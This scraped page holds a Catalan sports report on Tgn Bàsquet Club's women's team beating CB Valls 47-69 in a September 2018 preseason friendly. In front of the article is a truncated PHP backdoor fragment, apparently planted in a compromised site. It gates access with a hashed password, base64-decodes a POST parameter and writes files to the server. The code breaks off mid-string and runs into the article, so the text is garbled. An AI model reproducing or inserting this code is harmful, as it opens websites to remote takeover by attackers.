function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior femení imposa un ritme frenètic i derrota el CB Valls en el segon amistós de pretemporada (47-69) - Tgn Bàsquet Club -

El sènior femení imposa un ritme frenètic i derrota el CB Valls en el segon amistós de pretemporada (47-69)

Updated: setembre 2, 2018

El sènior femení A ha guanyat aquesta tarda el CB Valls al Joana Ballart en el que ha estat el segon partit amistós de la pretemporada pel conjunt lila —el primer partit es va jugar a Vilanova contra el Samà, amb resultat de 49-60 per les tarragonines—. L’equip que entrena Juan Carlos Arjona ha trencat el partit després del descans fent una exhibició de força, ritme i velocitat contra un rival que tot just jugava el primer partit d’aquest estiu. El conjunt vallenc, que jugarà a Primera Catalana, ha plantat cara en els primers minuts, gràcies a la concentració i la tècnica d’algunes de les seves jugadores (26-32 al descans). Amb tot, l’alt ritme de joc del TGN Bàsquet ha anat esgotant les locals que, a poc a poc, han anat cedint terreny, superades per les transicions tarragonines.

Ha estat una nova oportunitat per veure en acció els dos fitxatges de l’equip lila d’aquest curs, Cristina Peña i Xisca Vachiano, que han demostrat una molt bona compenetració amb la resta de les seves companyes i, com totes les altres jugadores, un bon to físic. La bona circulació de pilota, a una gran velocitat, i les poques pèrdues de pilota (tenint en compte el ritme de circulació esmentat), a més de les recuperacions defensives, han permès una diferència molt còmoda.

El tercer amistós serà contra el CB Balaguer i es jugarà el 7 de setembre a Cornudella de Montsant (12.30 h).